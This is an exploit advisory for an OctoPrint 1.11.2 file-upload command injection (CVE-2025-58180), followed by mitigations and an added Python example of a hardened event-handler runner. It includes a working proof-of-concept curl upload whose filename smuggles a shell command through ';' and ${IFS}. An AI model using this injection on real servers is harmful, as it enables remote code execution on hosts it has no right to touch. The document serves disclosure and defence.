OctoPrint 1.11.2 File Upload
OctoPrint 1.11.2 contains a file upload vulnerability that lets an authenticated user trigger remote code execution through a crafted malicious filename; it affects older versions and requires upgrading to 1.11.3 or applying other mitigations. 2026-4-9 20:52:26 Author: cxsecurity.com

# Exploit Title: OctoPrint 1.11.2 - File Upload
# Date: 2025-09-28
# Exploit Author: prabhatverma.addada
# Vendor Homepage: https://octoprint.org
# Software Link: https://github.com/OctoPrint/OctoPrint
# Affected Version(s): <= 1.11.2
# Patched Version(s): 1.11.3
# CVE: CVE-2025-58180
# CVSS (per advisory): 7.5
# Platform: Linux / OctoPrint server
# Type: Remote Code Execution (requires authenticated upload / API key or session)
#
# Short description:
# An authenticated attacker with file-upload access can craft a filename containing shell metacharacters (e.g. ';', ${IFS}) which bypasses filename
# sanitization and, when interpolated into a configured system event handler command, results in arbitrary command execution on the host.
#
# Scope & privileges:
# - Trigger privileges: Authenticated file-upload (API key or valid session). NO admin/root required to trigger the attack.
# - Precondition: A system event handler that executes shell commands using filename/path placeholders must be configured by an administrator.
#
# Tested on:
# - OctoPrint 1.11.2 running via `octoprint serve --port 5000` on Ubuntu 22.04
#
# Reproduction / PoC (manual):
#
# 1) Start OctoPrint 1.11.2:
#    octoprint serve --port 5000 --debug
#    Complete initial setup at http://127.0.0.1:5000 and create an admin user.
#
# 2) Configure a system event handler that runs shell commands with filename placeholders:
#    Edit ~/.octoprint/config.yaml and add:
#
#    events:
#      enabled: true
#      subscriptions:
#        - event: FileAdded
#          type: system
#          debug: true
#          command: "{path}"
#
#    Restart OctoPrint.
#
# 3) Create a harmless test gcode:
#    mkdir -p /tmp/gcode
#    cat > /tmp/gcode/ok.gcode <<'EOF'
#    ; minimal gcode
#    G28
#    M105
#    EOF
#
# 4) Obtain API key from Settings -> API and export it:
#    export API_KEY='<your_api_key_here>'
#
# 5) Ensure target proof file does not exist:
#    ls -la /tmp/test123
#
# 6) PoC upload (non-destructive proof):
#    INJECT_NAME='octo;touch${IFS}/tmp/test123;#.gcode'
#
#    curl -sS -X POST -H "X-Api-Key: $API_KEY" \
#      -F "file=@/tmp/gcode/ok.gcode;filename=\"${INJECT_NAME}\"" \
#      "http://127.0.0.1:5000/api/files/local"
#
# 7) Verify execution:
#    ls -la /tmp/test123
#    If /tmp/test123 exists, the injected command executed and RCE is demonstrated.
#
# Explanation:
# - OctoPrint accepted the uploaded filename (sanitize_name allowed these characters in default config).
# - FileAdded event payload contains the filename/path.
# - A system event subscriber executed a shell command with that placeholder via subprocess with shell=True and without placeholder escaping.
# - Shell metacharacters in the filename are interpreted by the shell and executed.
#
# Mitigations / Workarounds:
# - Upgrade OctoPrint to 1.11.3 (patched).
# - Disable event handlers using filename placeholders (set enabled: false or uncheck in GUI Event Manager).
# - Set feature.enforceReallyUniversalFilenames: true in config.yaml and vet existing uploads.
# - Do not expose OctoPrint to hostile networks; restrict upload access.
#
# References:
# - GitHub Security Advisory: https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-49mj-x8jp-qvfc
# - PoC repo: https://github.com/prabhatverma47/CVE-2025-58180
#
# Notes for triage:
# - Exploit requires only authenticated upload privileges to trigger. No admin/root required to perform the attack.
# - PoC uses non-destructive `touch /tmp/test123`.
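The root cause in the Explanation section is a placeholder interpolated into a single string run with shell=True. Below, as an added example that is not OctoPrint's or the advisory author's code, the vulnerable rendering sits beside a hardened handler runner that tokenizes the template first and substitutes each placeholder into its own argv element, so no shell ever parses the filename. The filename allowlist is an assumed approximation of the enforceReallyUniversalFilenames mitigation, not OctoPrint's exact rule; the sample payloads are constructed, reusing the advisory's PoC filename as the hostile input.

```python
"""Hardened event-handler execution versus the vulnerable shape described above."""
import re
import shlex
import subprocess

# Constructed sample payloads: a benign upload and the advisory's PoC filename.
BENIGN = {"name": "ok.gcode", "path": "/tmp/gcode/ok.gcode"}
HOSTILE = {"name": "octo;touch${IFS}/tmp/test123;#.gcode",
           "path": "/tmp/gcode/octo;touch${IFS}/tmp/test123;#.gcode"}

# Conservative allowlist standing in for a "really universal" filename policy.
# Assumed approximation of the mitigation, not OctoPrint's exact rule.
UNIVERSAL_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,254}$")


def is_universal_filename(name: str) -> bool:
    """Gate uploads so no event payload can ever carry shell metacharacters."""
    return bool(UNIVERSAL_NAME.match(name)) and ".." not in name


def render_unsafe(template: str, payload: dict) -> str:
    """Vulnerable shape: one interpolated string handed to a shell (shell=True).
    Only rendered here, never executed, to show what the shell would parse."""
    return template.format(**payload)


def build_argv(template: str, payload: dict) -> list:
    """Safe shape: tokenize the template first, then substitute each placeholder
    inside its own argv element. A filename can then never add words, ';' or
    redirections, because no shell parses the substituted value."""
    return [token.format(**payload) for token in shlex.split(template)]


def run_handler(template: str, payload: dict) -> str:
    """Run the handler with shell=False and return its stdout without the newline."""
    argv = build_argv(template, payload)
    result = subprocess.run(argv, capture_output=True, text=True, check=False)
    return result.stdout.rstrip("\n")


if __name__ == "__main__":
    tmpl = "echo {path}"
    print(is_universal_filename(HOSTILE["name"]))  # False: rejected at upload time
    print(render_unsafe(tmpl, HOSTILE))            # what a shell=True handler would run
    print(run_handler(tmpl, HOSTILE))              # echoed back verbatim, nothing else ran
```

With the argv approach the hostile path is delivered to the handler as one argument, so a template such as `cp {path} /backup/` copies the file instead of running the embedded command.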


Source: https://cxsecurity.com/issue/WLB-2026040005